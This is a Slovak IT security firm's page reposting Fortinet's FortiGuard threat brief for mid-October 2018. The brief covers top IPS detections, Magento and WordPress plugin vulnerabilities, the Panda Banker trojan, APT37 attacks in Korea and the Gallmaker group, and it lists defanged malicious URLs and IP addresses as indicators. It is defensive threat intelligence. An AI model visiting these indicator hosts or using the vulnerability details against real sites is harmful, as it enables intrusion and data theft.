Články

Aktuálne informácie zo sveta bezpečnosti IT riešení

Aktuálne hrozby podľa Fortinetu za 13. - 19.10. 2018 viac článkov »

Aktuálne hrozby podľa Fortinetu za 13. - 19.10. 2018

Vďaka nášmu partnerovi Fortinet, vám aj tento týždeň prinášame report odhalených hrozieb za predchádzajúci týždeň. Report si môžete precitať nižšie v anglickom jazyku. V prípade otázok nás neváhajte kontaktovať.


 

 

Recognizing and preventing modern cyber scams is difficult. As FortiGuard's Sr. Security Strategist, Ladi Adefala, points out in his blog post, cybercriminals use a wide variety of scam tactics to gain access to your devices and networks to steal information or extort money. It is important to understand the various social engineering tactics that bad actors are using to trick users. Ladi spells out ways you can identify and minimize the impact of cyber scams by learning more about what tactics are being employed.

Cyber scams can affect anybody unaware of these common warning signs. As people continue to adopt devices that connect directly to the internet, the risk of falling victim to a scam increases. By being aware of the common cyber scam tactics that we see targeting people today, as well as recognizing those common telltale signs, you can better safeguard your valuable information.

Fortinet has a variety of security tools that will help detect or block scams, depending on the various techniques being used. For example, our Web Filtering program blocks, and blacklists scam related URLs; FortiMail leverages our powerful Anti-spam solution; Our award winning AntiVirus solution can detect scams, and block downloads when necessary. For more information on our security services visit our Security Subscriptions Webpage

Recognizing and Preventing Modern Cyber Scams Blog

 

Application Vulnerabilities / IPS

 

Rank

Name

Prevalence

1

MS.IIS.WebDAV.PROPFIND.ScStoragePathFromUrl.Buffer.Overflow

41,472

2

Dasan.GPON.Remote.Code.Execution

28,000

3

D-Link.DSL-2750B.CLI.OS.Command.Injection

27,331

4

Avtech.Devices.HTTP.Request.Parsing.Multiple.Vulnerabilities

23,339

5

Oracle.WebLogic.Server.wls-wsat.Component.Code.Injection

19,591

 

Magento.eCommerce.Web.Sites.Remote.Code.Execution – Magento is one of the most popular ecommerce platforms in use today, with an estimated install base of over 500,000 sites using it. It is now part of Adobe and provides both free and paid versions of the platform, with a big chunk of Fortune 500 companies using this as their choice of e-commerce framework.

This signature helps detect against flaws on Magento 1.9.1.0 CE and 1.14.1.0 EE: CVE-2015-1397 (SQL injection vulnerability), CVE-2015-1398 (multiple directory traversal vulnerabilities), and CVE-2015-1399 (remote file inclusion vulnerability), which can be exploited together in an attempt to try to execute attacker-controlled payload on a vulnerable web server.

One of the issues arises because of lack of sanitization on URLs that access administrative scripts on the system. Magento can be tricked to execute administrative paths only by appending "Adminhtml" (a string that Magento would append to a string in case the admin user is logged into the system at the time of a requested action) to the URL.

If successfully exploited, and with full access to the system, the attacker would then be able to grab sensitive customer data such as username, passwords, credit card information as well as other personally identifiable information.

We are seeing attackers leveraging this exploit against sensors in Spain and Australia, with close to 800,000 hits in the last 30 days. At the time of this writing, there was public information on how to exploit this vulnerability as well as proof of concept exploit code for it. 

Signatures: Magento.eCommerce.Web.Sites.Remote.Code.Execution 

WordPress.Multiple.Plugins.CMS.Software.Arbitrary.File.Upload – Several arbitrary remote file upload vulnerabilities exist in multiple WordPress plugin components such as the mobile and web-app-builder. In one of the flaws the code in file /server/images.php (other plugins have other paths) doesn't require authentication or prechecks that the user is allowed to upload content.

The vulnerability affects Zen App Mobile Native <=3.0 (CVE-2017-6104)n2. WordPress Plugin webapp-builder v2.0 (CVE-2017-1002002)n3. WordPress Plugin wp2android-turn-wp-site-into-android-app v1.1.4 CVE-2017-1002003)n4.WordPress Plugin mobile-app-builder-by-wappress v1.05 CVE-2017-1002001)n5. WordPress Plugin mobile-friendly-app-builder-by-easytouch v3.0 (CVE-2017-1002000). If the attack is successful it could run code in the context of the running httpd process, and since on top of that, there is no validating if a user can upload code, it also does not check if the user is uploading executable code or data. We are seeing increased telemetry on this signature targeting the U.S. (17.90%) Japan (4.90%) and Taiwan (4.71%).

Signatures: WordPress.Multiple.Plugins.CMS.Software.Arbitrary.File.Upload

 

Malware Activity

 

Rank

Name

Prevalence

1

Android/Agent.FJ!tr

9,811

2

Adware/Agent

5,164

3

W32/Agent.AJFK!tr

3,999

4

W32/Injector.EALR!tr

3,675

5

Riskware/CoinHive

3,422

 

Panda Banker - I'd Rather Bank with a Human –  FortiGuard Labs is aware of a new reemergence of the nefarious banking Trojan, Panda Banker. Discovered by researchers this week, this latest reemergence of Panda Banker appears to be targeting Canada, Japan, and the United States. Panda Banker is essentially a variant of the infamous Zeus banking Trojan, and is constantly receiving updates by its authors. Panda Banker's modus operandi is to steal banking information, specifically in the form of man-in-the-browser (MitB) attacks on a real-time web session. This is done by injecting malicious code into the session browser of the victim machine. Panda Banker will sniff for credit cards, banking accounts, and other personal information.

What makes Panda Banker dangerous is that it will perform cursory checks in real time to determine if it is running on a machine or sandbox to evade analysis and detection. It will look for various forensic and analysis tools, such as network capture tools, debuggers, disassemblers, and various other tools used in malware analysis. If it discovers these tools, it will simply exit and delete the payload.

Panda Banker will then create copies of itself on the victim machine. Once it is done, the process will then launch the newly created executable before exiting, and then the newly created copy creates two svchost.exe processes and injects itself into them. It will then look for process name of commonly used web browsers, and if it finds them, it will inject a plugin.dll into it to hijack and intercept traffic between the browser and the victim machine. This is done once it identifies that a connection is made to a website that is specified within its parameters, such as well-known or targeted financial institutions. Due to multiple layers of obfuscation along with various layers of encryption, it makes for difficult analysis of not only malware itself but its web traffic. Further tricks that Panda Banker employs to make analysis more difficult are the use of a domain generating algorithm (DGA) and Mersenne Twister to generate random values.

Signatures: W32/Kryptik.GJUV!tr.ransom, W32/Panda.BUD!tr, W32/Zbot.ADC!tr.spy, W32/GenKryptik.CJRU!tr, W32/Kryptik.GIRS!tr, W32/GenKryptik.CGCC!tr, W32/Kryptik.GATM!tr, W32/Generik.LKEPZGS!tr, W32/Panda.BPX!tr, W32/GenKryptik.CHNI!tr, W32/GenKryptik.CFWA!tr, W32/Panda.BRE!tr, W32/Kryptik.GJQC!tr, W32/Kryptik.GJOP!tr, W32/GenKryptik.CFTK!tr, W32/GenKryptik.CFSX!tr, W32/GenKryptik.CHTQ!tr, W32/Kryptik.GJKE!tr

New Targeted Attacks in Korea Discovered –
 FortiGuard Labs is aware of targeted attacks occurring in South Korea by Reaper/APT37/ScarCruft/Geumseong121. Discovered by researchers, it appears that this group uses multiple techniques to identify potential targets for compromise. Reconnaissance is done on targets identified via KakaoTalk, a messaging platform popular in South Korea. Once reconnaissance is complete, the targets identified are attacked via a two-pronged approach. One is the use of various known vulnerabilities in Adobe Flash CVE-2018-4878 (use after free) used in conjunction with the Hangul Word Processor (HWP) where the embedded flash file contains an encrypted binary blob that ultimately retrieves the payload from a remote site. It has been observed that the same techniques are also used in Excel (XLS + CVE-2018-4878) as well as Word documents containing malicious macros. Other Flash vulnerabilities observed being used by attackers are CVE-2015-5119 and CVE-2015-0313. Other techniques used are watering hole attacks as well as malicious Android APK files, which appear to be related to KevDroid. Interesting observations made in this attack are that the malware is set to look for a specific journalist name and machine name as well as the news institution name. If these parameters are not present, the malware simply exits. Other observations made were the use of possible false flags, as some of the language used was Romanized Chinese, with incorrect usage, which makes attribution difficult.

Signatures: MSIL/Kryptik.EGY!tr, W32/Generic.DUG!tr.bdr, Android/KevDroid.A!tr, MSIL/Agent.SIM!tr, W32/Agent.DUE!tr.dldr

Indicator(s):
hxxp://endlesspaws.com/vog/tan.php?
hxxp://endlesspaws.com/vog/denk.zip
seline[.]co[.]kr/datafiles/CNOOC[.]php
www[.]causwc[.]or[.]kr/board_community01/board_community01/index2[.]php 
www[.]kumdo[.]org/admin/noti/files/iindex[.]php 
www[.]icare[.]or[.]kr/upload/board/index1[.]php
cnjob[.]co[.]kr/data/blog/iindex[.]php
notac[.]co[.]kr/admin/case/iindex[.]php
hxxp://ebsmpi.com/ipin/360/down.php
hxxp://cgalim.com/admin/hr/hr.doc
175[.]45[.]178[.]133

Web Filtering Activity


Gallmaker: New Threat Group in the Middle East and Eastern Europe – The FortiGuard Labs Web Filtering team is aware of a new threat group targeting government, military, and defense sectors, mainly in Eastern Europe and the Middle East. It is believed that their attacks have begun since December 2017 and had a spike in April 2018. The actor behind the campaign uses custom malware and utilizes living-off-the-land (LotL) tactics as well as publicly available hack tools. They also exploit Microsoft Office DDE by starting off as possibly a typical spear-phishing email. It is then followed by a series of steps inclusive of controlling the victim's system remotely and executing various tools. There are specific PowerShell commands used that were tracked as suspicious and successfully led to this discovery.

The FortiGuard Labs Web Filtering team has blacklisted all the related network IOCs used by Gallmaker.

Indicator(s):
111[.]90[.]149[.]99/o2
94[.]140[.]116[.]124/o2
94[.]140[.]116[.]231/o2

Source : https://fortiguard.com/resources/threat-brief/2018/10/19/fortiguard-threat-intelligence-brief-october-19-2018

Prečo si vybrať nás?

Dôveryhodnosť

Na trhu pôsobíme už od roku 2008 a našu dôveryhodnosť potvrdzujú partnerstvá popredných spoločností v oblasti IT a hlavne množstvo spokojných zákazníkov, ktorí využívajú naše služby. Nie sme nováčikom a vieme, čo vaša IT infraštruktúra potrebuje a radi vám to ponúkneme. O našej kvalite hovorí aj certifikácia systémov manažérstva podľa normy ISO 9 001.

Profesionalita

Bezpečnosť vašich dát nedokáže chrániť len tak niekto. Obráťte sa teda na profesionálneho partnera. Naše bohaté skúsenosti potvrdzujú školenia, ktoré naši zamestnanci absolvujú pravidelne, aby vám vedeli vždy poskytnúť adekvátne rady a zabezpečiť tak plynulý a ničím nerušený chod vašej infraštruktúry. Sme vlastníkom certifikácie 27 001, takže vaše dáta sú u nás v bezpečí.

Efektivita

Neponúkame vám riešenia, ktoré sú pre vás zbytočné, len aby sme na vás zarobili. Našim cieľom nie je nanútiť vám robustné riešenie, ktoré budete využívať na minimum, no zároveň návrh štruktúry berieme vážne aj s ohľadom na prípadné plány rozvoja vašej spoločnosti. Prioritou pre nás je vaša spokojnosť a bezpečnosť vašich dát.

Referencie

Mercedes-Benz Slovakia, s.r.o.
Slovak Telekom, a.s.
Saneca Pharmaceuticals a.s.
Úrad vlády Slovenskej republiky
CNC, a.s.
Trenčianska vodohospodárska spoločnosť a. s.

Kontakt


ReFoMa, s.r.o.
Dolné Rudiny 1
010 01 Žilina, Slovakia

+421 41/202 88 80 – sekretariát
+421 41/202 88 81 – technická podpora
+421 41/202 88 82 – obchodné oddelenie
IČO: 43892345
DIČ: 2022541378
IČ DPH: SK2022541378
Okresný súd Žilina, odd.: Sro, vl. číslo 20197/L

Bankové spojenie (IBAN):
SK13 1100 0000 0026 2582 3735